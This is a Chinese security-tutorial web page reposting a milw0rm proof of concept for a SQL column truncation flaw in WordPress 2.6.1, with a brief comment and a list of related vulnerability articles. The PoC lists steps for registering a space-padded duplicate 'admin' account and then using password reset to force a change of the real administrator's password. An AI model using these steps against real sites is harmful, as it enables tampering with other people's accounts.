手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >WordPress 2.6.1 SQL Column Truncation Vulnerability分析
WordPress 2.6.1 SQL Column Truncation Vulnerability分析
摘要:用wordpress的要注意了,不过拿我这里测试就没效果了,我从一开始就是关闭用户注册的。#WordPress2.6.1SQLColumnT...

用wordpress的要注意了,不过拿我这里测试就没效果了,我从一开始就是关闭用户注册的。 # WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)

#

# found by irk4z[at]yahoo.pl

# homepage: http://irk4z.wordpress.com/

#

# this is not critical vuln [;

#

# first, read this discovery:

# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/

#

# in this hack we can remote change admin password, if registration enabled

#

# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends 1. go to url: server.com/wp-login.php?action=register 2. register as: login: admin x

email: your email^ admin[55 space chars]x now, we have duplicated 'admin' account in database 3. go to url: server.com/wp-login.php?action=lostpassword 4. write your email into field and submit this form 5. check your email and go to reset confirmation link 6. admin's password changed, but new password will be send to correct admin email ;/ # milw0rm.com

【WordPress 2.6.1 SQL Column Truncation Vulnerability分析】相关文章:

PHPWIND1.3.6论坛漏洞分析

遨游已经修复的三个安全漏洞分析

苹果浏览器存在文件下载远程拒绝服务漏洞

织梦管理系统后台查找

Cisco 操作系统IOS存在DLSw拒绝服务漏洞

Cisco Unified Communications 远程命令执行漏洞

黑客通过Paypal可传输恶意图像

OpenBSD DHCPD 服务程序远程栈溢出漏洞

WordPress AdServe的adclick.ph 远程SQL注入漏洞

解析PNG图象格式库存在远程拒绝服务漏洞

精品推荐
分类导航